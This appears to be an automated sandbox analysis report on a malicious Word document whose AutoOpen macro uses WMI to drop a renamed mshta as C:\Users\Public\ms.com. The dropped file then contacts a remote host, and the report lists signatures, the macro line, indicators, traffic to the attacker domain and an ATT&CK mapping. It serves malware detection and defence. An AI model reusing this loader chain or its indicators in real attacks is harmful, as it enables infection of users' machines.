Play interactive tour

Edit tour

Analysis Report documenti 12.01.20.doc

Overview

General Information

Sample Name:	documenti 12.01.20.doc
Analysis ID:	326338
MD5:	f530de77053a5c25a94f930bb954bcf8
SHA1:	46cbf6e7a7ad04e3586c88a7a0d2cbcb141c3ec4
SHA256:	1e70cc7a76bf59a5b559e496a0e83f91e13526533c89f001619ca70324ebfd82
Most interesting Screenshot:

Detection

Score:	76
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Document exploit detected (drops PE files)

Multi AV Scanner detection for submitted file

Creates processes via WMI

Drops PE files to the user root directory

Drops PE files with a suspicious file extension

Machine Learning detection for sample

Office process drops PE file

Allocates memory with a write watch (potentially for evading sandboxes)

Creates a window with clipboard capturing capabilities

Detected potential crypto function

Document contains an embedded VBA macro which executes code when the document is opened / closed

Document contains an embedded VBA macro which reads document properties (may be used for disguise)

Document contains embedded VBA macros

Document contains no OLE stream with summary information

Document has an unknown application name

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the user directory

May sleep (evasive loops) to hinder dynamic analysis

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Searches for the Microsoft Outlook file path

Uses a known web browser user agent for HTTP communication

Classification

Startup

System is w7x64

WINWORD.EXE (PID: 1320 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)

ms.com (PID: 2524 cmdline: C:\users\public\ms.com C:\users\public\ms.html MD5: 95828D670CFD3B16EE188168E083C3C5)

cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: documenti 12.01.20.doc

Virustotal: Detection: 29%

Perma Link

Machine Learning detection for sample

Show sources

Source: documenti 12.01.20.doc

Joe Sandbox ML: detected

Software Vulnerabilities:

Document exploit detected (drops PE files)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: ms.com.0.dr

Jump to dropped file

Source: global traffic

DNS query: name: nfj254aim.com

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 172.67.164.220:80

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 172.67.164.220:80

Source: global traffic

HTTP traffic detected: GET /analytics/0D5FgQlJcMskzpbtgQBE7OE_tLI3/BUu5qgsI6FW8bkEsrF2HLHJUIr/lRD_7cnWmi/rwwHf1xOO/7n6dDzF/xspcd2?RltAN=vsETwS&G_=Ro_LgyQulrPjxaAj&wixw=XYJCRUJhgYHPY&bkUOD=AXjbvUQDbTcWkz HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: nfj254aim.comConnection: Keep-Alive

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{1E8D2110-90B9-4F45-8DA5-C9F08E2C2850}.tmp

Jump to behavior

Source: global traffic

Source: ms.com, 00000002.00000002.2354632400.0000000005324000.00000004.00000001.sdmp	String found in binary or memory: /moc.nideknil.wwwwww.linkedin.comF0Tn~{ equals www.linkedin.com (Linkedin)
Source: ms.com, 00000002.00000002.2352839478.0000000002F40000.00000002.00000001.sdmp	String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: ms.com, 00000002.00000002.2354632400.0000000005324000.00000004.00000001.sdmp	String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)

Source: unknown

DNS traffic detected: queries for: nfj254aim.com

Source: ms.com, 00000002.00000002.2352839478.0000000002F40000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: ms.com, 00000002.00000002.2352839478.0000000002F40000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: ms.com, 00000002.00000002.2353054837.0000000003127000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: ms.com, 00000002.00000002.2353054837.0000000003127000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: ms.com, 00000002.00000003.2097326345.0000000002BD5000.00000004.00000001.sdmp	String found in binary or memory: http://nfj254aim.com/analytics/0
Source: ms.com, 00000002.00000002.2353753641.000000000339D000.00000004.00000001.sdmp, ms.com, 00000002.00000002.2354478986.0000000003F60000.00000004.00000040.sdmp	String found in binary or memory: http://nfj254aim.com/analytics/0D5FgQlJcMskzpbtgQBE7OE_tLI3/BUu5qgsI6FW8bkEsrF2HLHJUIr/lRD_7cnWmi/rw
Source: ms.com, 00000002.00000002.2353870588.0000000003710000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: ms.com, 00000002.00000002.2353054837.0000000003127000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: ms.com, 00000002.00000002.2353054837.0000000003127000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: ms.com, 00000002.00000002.2353870588.0000000003710000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: ms.com, 00000002.00000002.2352839478.0000000002F40000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: ms.com, 00000002.00000002.2353054837.0000000003127000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: ms.com, 00000002.00000002.2352839478.0000000002F40000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: ms.com, 00000002.00000002.2352839478.0000000002F40000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.

Source: C:\Users\Public\ms.com

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

System Summary:

Office process drops PE file

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\Public\ms.com

Jump to dropped file

Source: C:\Users\Public\ms.com	Code function: 2_2_000000013F2A1238		2_2_000000013F2A1238
Source: C:\Users\Public\ms.com	Code function: 2_2_02E10215		2_2_02E10215

Source: documenti 12.01.20.doc	OLE, VBA macro line: Sub AutoOpen()
Source: VBA code instrumentation	OLE, VBA macro: Module aH8xms, Function AutoOpen			Name: AutoOpen

Source: documenti 12.01.20.doc

OLE, VBA macro line: a8qpd = activedocument.builtindocumentproperties(afav8)

Source: documenti 12.01.20.doc

OLE indicator, VBA macros: true

Source: documenti 12.01.20.doc

OLE indicator has summary info: false

Source: documenti 12.01.20.doc

OLE indicator application name: unknown

Source: Joe Sandbox View

Dropped File: C:\Users\Public\ms.com 8C10AE4BE93834A4C744F27CA79736D9123ED9B0D180DB28556D2D002545BAF2

Source: C:\Users\Public\ms.com

Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: ms.com, 00000002.00000002.2352839478.0000000002F40000.00000002.00000001.sdmp

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal76.expl.winDOC@2/13@2/1

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$cumenti 12.01.20.doc

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRD1DF.tmp

Jump to behavior

Source: documenti 12.01.20.doc	OLE document summary: title field not present or empty
Source: documenti 12.01.20.doc	OLE document summary: author field not present or empty
Source: documenti 12.01.20.doc	OLE document summary: edited time not present or 0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

WMI Queries: IWbemServices::ExecMethod - Win32_Process::create

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\ms.com

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\Public\ms.com	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\Public\ms.com	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: documenti 12.01.20.doc

Virustotal: Detection: 29%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Users\Public\ms.com C:\users\public\ms.com C:\users\public\ms.html

Source: C:\Users\Public\ms.com

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Users\Public\ms.com

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: mshta.pdbH source: ms.com, 00000002.00000000.2086819333.000000013F2A1000.00000020.00020000.sdmp, ms.com.0.dr
Source:	Binary string: wshom.pdb source: ms.com, 00000002.00000002.2351536159.00000000029D0000.00000002.00000001.sdmp
Source:	Binary string: mshta.pdb source: ms.com, ms.com.0.dr

Persistence and Installation Behavior:

Creates processes via WMI

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

WMI Queries: IWbemServices::ExecMethod - Win32_Process::create

Drops PE files with a suspicious file extension

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\Public\ms.com

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\Public\ms.com

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\Public\ms.com

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\Public\ms.com

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\ms.com	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\Public\ms.com	Memory allocated: 1FE0000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\ms.com	Memory allocated: 27D0000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\ms.com	Memory allocated: 2920000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\ms.com	Memory allocated: 29B0000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\ms.com	Memory allocated: 29F0000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\ms.com	Memory allocated: 2A10000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\ms.com	Memory allocated: 2A70000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\ms.com	Memory allocated: 2BC0000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\ms.com	Memory allocated: 3420000 memory commit \| memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\Public\ms.com TID: 2828

Thread sleep time: -300000s >= -30000s

Jump to behavior

Source: C:\Users\Public\ms.com	Code function: 2_2_000000013F2A1944 SetUnhandledExceptionFilter,	2_2_000000013F2A1944
Source: C:\Users\Public\ms.com	Code function: 2_2_000000013F2A1C04 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,TerminateProcess,	2_2_000000013F2A1C04
Source: C:\Users\Public\ms.com	Code function: 2_2_000000013F2A40A0 SetUnhandledExceptionFilter,	2_2_000000013F2A40A0

Source: ms.com, 00000002.00000002.2350761378.0000000000B80000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: ms.com, 00000002.00000002.2350761378.0000000000B80000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: ms.com, 00000002.00000002.2350761378.0000000000B80000.00000002.00000001.sdmp	Binary or memory string: !Progman

Source: C:\Users\Public\ms.com

Code function: 2_2_000000013F2A1B14 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,GetTickCount,QueryPerformanceCounter,

2_2_000000013F2A1B14

Source: C:\Users\Public\ms.com

Code function: 2_2_000000013F2A1238 rand_s,VirtualAlloc,GetVersion,GetModuleHandleW,GetProcAddress,??2@YAPEAX_K@Z,??2@YAPEAX_K@Z,RegOpenKeyExA,RegQueryValueExA,ExpandEnvironmentStringsA,LoadLibraryA,??3@YAXPEAX@Z,??3@YAXPEAX@Z,RegCloseKey,GetModuleHandleW,GetProcAddress,??2@YAPEAX_K@Z,MultiByteToWideChar,UnregisterApplicationRestart,??3@YAXPEAX@Z,GetProcAddress,FreeLibrary,??3@YAXPEAX@Z,??3@YAXPEAX@Z,RegCloseKey,

2_2_000000013F2A1238

Source: C:\Users\Public\ms.com

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation11	Path Interception	Process Injection2	Masquerading211	OS Credential Dumping	System Time Discovery1	Remote Services	Email Collection1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scripting2	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Virtualization/Sandbox Evasion2	LSASS Memory	Virtualization/Sandbox Evasion2	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Exploitation for Client Execution13	Logon Script (Windows)	Logon Script (Windows)	Process Injection2	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Clipboard Data1	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Scripting2	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol12	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	File and Directory Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Information Discovery7	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
documenti 12.01.20.doc	29%	Virustotal		Browse
documenti 12.01.20.doc	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
